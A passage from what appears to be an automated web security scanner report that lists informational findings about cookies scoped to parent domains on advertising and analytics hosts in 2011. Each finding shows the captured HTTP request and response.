Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035094&rn=1217795641&c7=http%3A%2F%2Farstechnica.com%2Fgadgets%2Fnews%2F2011%2F05%2Fmore-chromebooks-from-google-chrome-os-web-store-updates-too.ars&c8=More%20Chromebooks%20from%20Google%3B%20Chrome%20OS%2C%20Web%20S&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 12 May 2011 13:27:58 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Sat, 11-May-2013 13:27:58 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

8.24. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6035951&c3=56 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Thu, 12 May 2011 13:33:33 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Sat, 11-May-2013 13:33:33 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;
8.25. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035308&d.c=gif&d.o=pcwmw-pcworld&d.x=60649168&d.t=page&d.u=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F227430%2Fchrome_os_will_likely_include_netflix_support.html HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Thu, 12 May 2011 13:31:29 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Sat, 11-May-2013 13:31:29 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;
8.26. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p82806590&c3=62874418&c4=40422013&c5=1&c6=3&c7=thu%20apr%2028%2021%3A29%3A14%202011&c8=http%3A%2F%2Fad.doubleclick.net%2Fadi%2FN1260.cnetzdnet%2FB5448313.5%3Bsz%3D300x250%3Bpc%3Dcbs513717%3Bclick0%3Dhttp%3A%2F%2Fadlog.com.com%2Fadlog%2Fe%2Fr%3D8041%26sg%3D513717%26o%3D6037%25253A13616%25253A%26h%3Dcn%26p%3D%26b%3D2%26l%3D%26site%3D2%26pt%3D2100%26nd%3D13616%26pid%3D%26cid%3D207595%26pp%3D100%26e%3D%26rqid%3D01c13-ad-e6%3A4DCB63ED638330%26orh%3D%26oepartner%3D%26epartner%3D%26ppartner%3D%26pdom%3D%26cpnmodule%3D%26count%3D%26ra%3D173.193.214.243%26pg%3DJ-kzEAoPOk4AAFIsDHEAAABP%26t%3D2011.05.12.13.27.52%26event%3D58%2F%3Bord%3D2011.05.12.13.27.52%3F&c9=Advertisement&c10=http%3A%2F%2Fwww.zdnet.com%2Fblog%2Fcomputers%2Fcan-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook%2F5773&c15=&1305206897365 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046; ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:16 2011&prad=62874418&arc=40422013&; BMX_G=method->-1,ts->1305206896; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 12 May 2011 13:30:29 GMT
Connection: close
Set-Cookie: UID=875e3f1e-184.84.247.65-1303349046; expires=Sat, 11-May-2013 13:30:29 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

8.27. http://badge.facebook.com/badge/10042561111.528147018.1934312001.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://badge.facebook.com
Path:   /badge/10042561111.528147018.1934312001.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /badge/10042561111.528147018.1934312001.png HTTP/1.1
Host: badge.facebook.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 95
Content-Type: image/png
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=qo83J; path=/; domain=.facebook.com
X-FB-Server: 10.144.22.108
X-Cnection: close
Date: Thu, 12 May 2011 13:31:32 GMT

.PNG
.
...IHDR.............%.V.....PLTE...........tRNS.@..f...
IDAT..c`.......qd.....IEND.B`.
8.28. http://badge.facebook.com/badge/111279988891248.528147018.678371001.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://badge.facebook.com
Path:   /badge/111279988891248.528147018.678371001.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /badge/111279988891248.528147018.678371001.png HTTP/1.1
Host: badge.facebook.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 95
Content-Type: image/png
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=v7n-W; path=/; domain=.facebook.com
X-FB-Server: 10.144.54.120
X-Cnection: close
Date: Thu, 12 May 2011 13:31:32 GMT

.PNG
.
...IHDR.............%.V.....PLTE...........tRNS.@..f...
IDAT..c`.......qd.....IEND.B`.
8.29. http://bcp.crwdcntrl.net/4/c=313%7Crand=255852379%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=313%7Crand=255852379%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=313%7Crand=255852379%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=6d4cb6550583e1fdb81b2fe52a3cce9a; aud=ABR4nGNgYGDwPbXkLAMDo%2F79yYfmMNgzMAgoNTA0MDCIeYMphl4IzwdM8VwGUyKvGEBAJBlM8dwEC4rmgin%2BSgjvGZjiWgsRrIJoPwuRSwdTHK0QXiJEyV8ILwFiQwHYaL5IiO2PwZTgLIg%2BI4jRM8CU8C6IhnMQU9wgpvhBqENgivcPxPb3EMOKIBTU9m0Qo79CVDJDBPdDlHRDBKXBlEAZRG4hhFoEMZMP4haIAwUqwJRQMphi44XwXkK8IgrRJwxxZx9Ew3GIkgwIBQkzoWIIVQKhIGbymkI0REHs84fwoiGOPwikALBDZfw%3D; cc=ACB4nGNQMEsxSU4yMzU1MLUwTjVMS0myMEwySks1NUo0Tk5OtUxkAALfU0vO%2Fn%2FyqIyBgVH%2F%2FuRDc0BiDDYhX7SYGRjO%2Ftb%2BDxS3BFKMDAxfILz%2FDMEhX7TxyAqy%2FQXJ%2FvwM4k8CUkBZSQjvP0OowLfdeGX34DFZ4NteRgbGTQwMQGGgBKOgiiE%2Bdyjm4ZF1sKjAZ9OvRhSbHCwq8brrCopqgZ8T8Pnx50Q8soJCxfhs%2BtmPz%2BQfc1Hc4SyrxAEzC6YMoglqMqPFhnUgSnKBLJI9YANAokwMDCz%2FGY4Hmj5ENfb3AhR%2BoKMTKt%2F0Hhr%2FLqp%2B76%2Bo8s630fho%2Bg1bUflGZqh8u8eofD0vNL43Kt%2BiCJVvux%2BVryuKytdpQuU7taHyTdrR9C9D5eujqTc4j8a%2FhBo%2BRw6h8LW1b%2BCJdG2NAjyyQSlH8enVasQjGxp2Fk9SVOb6ywqXRdWLrpZJ%2B7QKbnsYtU8r45ENO4PHf4xKSRfANmmBwgrID6pmArtZE%2BIOTYg7NKGqI8XM8Jjln78Or00rUWyK2ByIR3VEkxQ%2BP134iGKWsoADHtUM3LJmFynKyAG8%2B9iIiitIogtcxEyRdVz1DRTp53y8nCL93Am7KNS%2FkyL9Tv8WkRLcMnXqlAV36ySK9PNVvKVIPwBMpM8N

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:33 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nCWRvUtCYRTGTxgh4tXrx3Vx6x8QBP%2BFCPpwFHNRHHQRQqOsyUUcohaXiJbcXRVaJIdEpBanRlGEXJraCpLnd5cfz3vOc87zvtfM7GS2yJjtpFaVYc8Ozdz9lrXMEkem7w51LBGcS8U3oCwEPwWvJoSvUWsZAn0hfIP9XfAqtJQEfxtVxP7H6HMhlBcCT%2FL501KRRyItqT2oFnsR4h9MOWDmG%2FtOUWMhSqfzS%2FhvqUSd2hTVJm6Xzg5TBmz%2FERwfM0dkueUwKbiXMrhX%2BJ7p7LEvRGrCu021RHnIPYcQX9zd4yr32GOoXQxV7BMMa9DgMEfLBYdNkmWonakWeSVggX%2BU3db%2BAUmdX9s%3D; Domain=.crwdcntrl.net; Expires=Mon, 06-Feb-2012 13:31:33 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMEsxSU4yMzU1MLUwTjVMS0myMEwySks1NUo0Tk5OtUxkAALf0w9N%2Fz9exsfAwKj%2FJH37IgawYMgXLWYGhrMMDP%2BB4pZAipGB4QuYxwRE%2FxiCQ75o41cgyPYXpOD%2FP5CCSV%2FWghRIAikg7x9DqMC33axw7aiyWAwDKt%2BD3zaBb3sZGRg3%2FdoFlGH8z8AoqGJIwHmKefgVOFhUELDyVyOKlQ4WlYTceIUFTQFUO5I6oEHC%2FN04DAIymAS%2BncIjK5%2FXhE%2Fvzwn44uTnRDyyZp9whQfIZEGhYgKe%2F9mPz%2Bofc1HC0llWiQNmHEwZRBMs4CxWZ4AoyVnXkRwCNgAkCrSK%2BR%2FD8f8MLKFhZ%2FE7LPzeTTz%2BiuC2wCMb%2FiYTj6zM%2F9O4ZRndrM%2FhkZUz3IJHVljNEo%2Bsf%2F5JPLLa2jdAsshhihQR2hoFeGSDUo7i06vViEdW8PtsRAKwBFIgV0F4QKS1RxWPbKBKDB7Z0J6ZeGTlGiXwyCpz%2FWXFkSwtwYIwtf8YmAJNH6Im0t8LUPiBjk6ofNN7qOq9v6LJ30XlO99G46PqDzRsReUbmaHy7R6j8vW80PjeqHyLIlS%2Brigq33Y%2FKl%2BnCZXv1Iamfxkq36Qdla%2BPpt7gPBr%2FEmp4HTmEwtc%2BrYI7fQFllfHIhp3Bk64ZlZIuMCLFNGNQNRNI9dfH4HQApFBkI8XMcBdlwNy3Dq9NK1HMitgciEd1RJMUPj9d%2BIhilrKAAx53MXDJml2kqFAN4N3HRkydDY2ywEXMFFnHVd9AkX7uhF0U6ed8vJxC%2B3dSpF%2BmTp2y8GudRJF%2Bvoq3FOkHALb3XBs%3D; Domain=.crwdcntrl.net; Expires=Mon, 06-Feb-2012 13:31:33 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 827

<html>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<html><body><div><!-- Begin comScore Tag --> <script>
...[SNIP]...
8.30. http://bcp.crwdcntrl.net/4/c=416%7Crand=357735581%7Cpv=y%7Cint=%23OpR%2311286%23Article%20%3A%20%7Cint=%23OpR%2311373%23Article%20%3A%20%20%3A%20%7Cint=%23OpR%2311668%23Article%20Categories%20%3A%20You%20are%20hereNational%20/%20Sports%20/%20Fight%20Sports%7Cmed=%23OpR%2311667%23Article%20%3A%20Sports%20%3A%20Fight%20Sports%7Casync=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=416%7Crand=357735581%7Cpv=y%7Cint=%23OpR%2311286%23Article%20%3A%20%7Cint=%23OpR%2311373%23Article%20%3A%20%20%3A%20%7Cint=%23OpR%2311668%23Article%20Categories%20%3A%20You%20are%20hereNational%20/%20Sports%20/%20Fight%20Sports%7Cmed=%23OpR%2311667%23Article%20%3A%20Sports%20%3A%20Fight%20Sports%7Casync=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=416%7Crand=357735581%7Cpv=y%7Cint=%23OpR%2311286%23Article%20%3A%20%7Cint=%23OpR%2311373%23Article%20%3A%20%20%3A%20%7Cint=%23OpR%2311668%23Article%20Categories%20%3A%20You%20are%20hereNational%20/%20Sports%20/%20Fight%20Sports%7Cmed=%23OpR%2311667%23Article%20%3A%20Sports%20%3A%20Fight%20Sports%7Casync=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=6d4cb6550583e1fdb81b2fe52a3cce9a; aud=ABR4nCWRP0tCYRyFf5FEiPePf%2B5d3PoCQtBXkKDMMcxFEawlCIu6NblIQ9TSEtGiu2tDS%2BSgRuTi1BYUQi1NQkOBcp473Ifzvuec9%2Ffea2ZWeHkfmi3kPuver62b%2BStNa5qFG6bnErUpkRhLZb5BTUi8CcG%2B4J2iJgrEu4J3RvxVCHZlWW7hrJL7R1WoPhDidwq4JYb4EJK3xFex3MiSfhAyI8rylPU5bwvVE1I4nT%2BG%2F5EKG%2Bw9o1qMe43znJZ7Tp8KziKdj0x2wWJW8I8V8E%2FItXF2OM9laq7iR7Kk%2BJBLDkN8CW5ALs2NrkCM6gHOPTABh3Ru03nEYsRka%2Bzt8FeKqLJU8mn%2BmgHa7mAa; cc=ACB4nGNQMEsxSU4yMzU1MLUwTjVMS0myMEwySks1NUo0Tk5OtUxkAALf0w9O%2FH%2B8rJqBgVH%2FSRr%2FD5AYg0fIFy1mBoazDAz%2FgeKWQIqRgeELmMcEFPjHEBzyRRu%2FAkG2vwgFk76sBymQBFJg2VCBb7tZcchiMQyofA9%2B2wS%2B7WVkYNz0aw9QhvE%2FA6OgiiEB5ynm4VfgYFFBwMpfjShWOlhUEnLjFRY0BVDtSOqABgnzd%2BMwCMhgFPh2Co%2BsfF4TPr0%2FJ%2BCJE7NPuHwM0TsRj15BoWICnv%2FZjy85%2FJiLEpbOskocMNUwZRBNsICzWJ0FoiRn3URyJtgAkCjQKqZ%2FDMf%2FM7CEhp0lkBC%2Bz8bja609qnhkA1Vi8MiG37uJRza0ZyYe2QhuC3wmv8nEIyvXKIFHVlv7BkgWOUyRIkJbowCPbFDKUXx6tRrxyCpz%2FcWX4xngbvzHwBRo%2BhA1OfxegMIPdHRC5ZveQ%2BPfRdXv%2FRVV3vk2Gh9Nv2ErKt%2FIDJVv9xiVr%2BeFxvdG5VsUofJt96PydUVR%2BTpNqHynNlS%2BSTua%2FmWofH009Qbn0fiXUMPnyCEUvvZpFdwxCZRVxiMbdgZPCmJUSrrAiBTTjEHVTCDVX5%2BC0wGQQpGNFDPDXWgw%2Buevw2vTShSzIjYH4lEd0SSFz08XPqKYpSzggMddDFyyZhcpKr4CePexEVM7QqMscBEzRdZx1TdQpJ%2Fz8XKK9HMn7KJQ%2F06K9MvUqVMWfq2TKNLPV%2FGWIv0AtwcG3g%3D%3D

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:08 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nCWRzytEcRTFr0ga75fveC9lJ9ZK%2BReU37uRsSGKlPLbjFKzkcXExkaymJmytLWwEQs%2FEimlLEWKjVJ2lHE%2Bb%2FFO595z7r3fe83MBm%2Be781qOl9nWzosaxa12f%2BX9AtsGzYg8B4EzR8FK1RhUuA9KRjPiYV5QfymYOpIEK6jvBVLhximFWzYxDCB8pfcuKDpkH7zkqQOxIJRfF1I9sWSF%2Frt0eGEAe%2FEGn1K9whciRdNUSxDvwuCX7Ah2f087BwfNZMNMf%2BHhXwSXER5hfKaIA%2FzdjFsITlm6m9GasfQi6QWySmzFAXRKrlW2BqSMlAhuMIsAWyBTbCQKEc%2FmHsEOFw9e3HvYkHMsvooneaaO8xZR7FLDDPKOU7slsiN4OO2bhnIschuJFkmG4aNMdlZ9fcHiTxN1g%3D%3D; Domain=.crwdcntrl.net; Expires=Mon, 06-Feb-2012 13:34:08 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMEsxSU4yMzU1MLUwTjVMS0myMEwySks1NUo0Tk5OtUxkAALf0w8v%2FH%2B8tJiBgVH%2FSZaEKkiMwV%2Fg2242BoazDAz%2FgeKTvqz6z8jAIAnhWf7%2FC%2BQxLgDygIJfgDwGBiYGBu5%2FDKEC3%2FYwA3WBhaDqEAo4%2FzEEC3zbC9S66dd2kAn%2FGRgFFfPwaxBUMSRk4hWEQ6EKoA6FuBBqG5JDgfYK83fjMBbI4BT4doIZZiaaYUATBL6dwqNXPq8Jj6ygUDF%2B74R80SKkQJtAgPx8jcfxgmx%2Fwdp%2FI8fr%2F38gHij%2Bfl7A5%2FGf1%2FDK3sUn%2B6sRJeIdLCrwe8PBopKQPyfg9clEPLJmnypY8SYaRJRxC%2Fzsx2fPj7ko%2FnKWVeJEDwWIJli%2BsVidisg%2BjJKzriBZBzYHJAq0kfcfw%2FH%2FDCze%2B%2FXwBKu1bgEeWXu3xXhkzflE8Mh6B1%2FFIxv8yRmPrNYeZdyyjILfV%2BKRFVYzwiMb2tODR9Y%2F%2FyU%2BvWFn8acobQ1wYAJjCymmITxgTAelHMUjq619A5%2BsViMe2QhuCzxFRvibTHyy927ikVXm%2BssKl0VNu%2BgBAHQIk%2BD32YikbgmkwAp%2BQwxjlPl%2FGrdVjFp7VPHoDVSJwSPrZn0Oj8lyhuD0AnY2zPULgBQjVHYLHr3CapZ4ZN2s1%2BAxObRnJh43y8%2Fgw6PXP%2F8kHnu9XlzHIxsIrfJwuOp8I77QaJTAFwvOt1EKq0Dne6h8IzNUvt1jVL7tflS%2BThMq36kNla%2B7DJWvjyrvfOQQqrzpQ1T53wtQ5R2d0NSjud%2F0Lqp%2B768ofAYeWbOL1CieA3j3sZPQOoI6IXARMzUs56pvoIYxPv9O4ygsuVonUcMCvoq31DDG6exTHO7kfLycGhZwJ%2ByijjE7qWGMTJ06NYwBALVfHMo%3D; Domain=.crwdcntrl.net; Expires=Mon, 06-Feb-2012 13:34:08 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 815

<html>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<html><body><div><!-- Begin comScore Tag --> <script>
...[SNIP]...
8.31. http://bidder.mathtag.com/iframe/notify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy8yNTQzOTc0Njg0NDcyNTQwNDcvMTA0MTIwLzEwMDQ3MC80L1EzQW1fQ25wZlFVZ053MjlWUjRoVGhpaXlIaTBCQlctVzV6TXhEOW5FbDgv/s3y_oOCh3r6kEExIjKyijkGnx4A&price=TcvhHwAGp0EK7FrEovpTs1SWtx2tmnBm2xV6cA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBRcf1H-HLTcHOGsS1sQezp-mXCtzvj_EBhpu-vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi0zNjI5OTM5MzY0Mzc1OTg0oAHg6pnsA7IBGnd3dy5taWxlaGlnaG9udGhlY2hlYXAuY29tugEKMTYweDYwMF9hc8gBCdoBYGh0dHA6Ly93d3cubWlsZWhpZ2hvbnRoZWNoZWFwLmNvbS8yMDExLzA1L25vLWZvb2xpbi1mcmVlLWNhdC1mcmlkYXktYWRvcHRpb24tc3BlY2lhbC1pbi1ib3VsZGVyL5gCnBjAAgTIAtbBjA6oAwHoA_MG6AO6KugD8gb1AwAAAMSABty1zYTyhKGTrwE%26num%3D1%26sig%3DAGiWqtzIVcp8F8Val1fxHHRvU63fV_G8kg%26client%3Dca-pub-3629939364375984%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
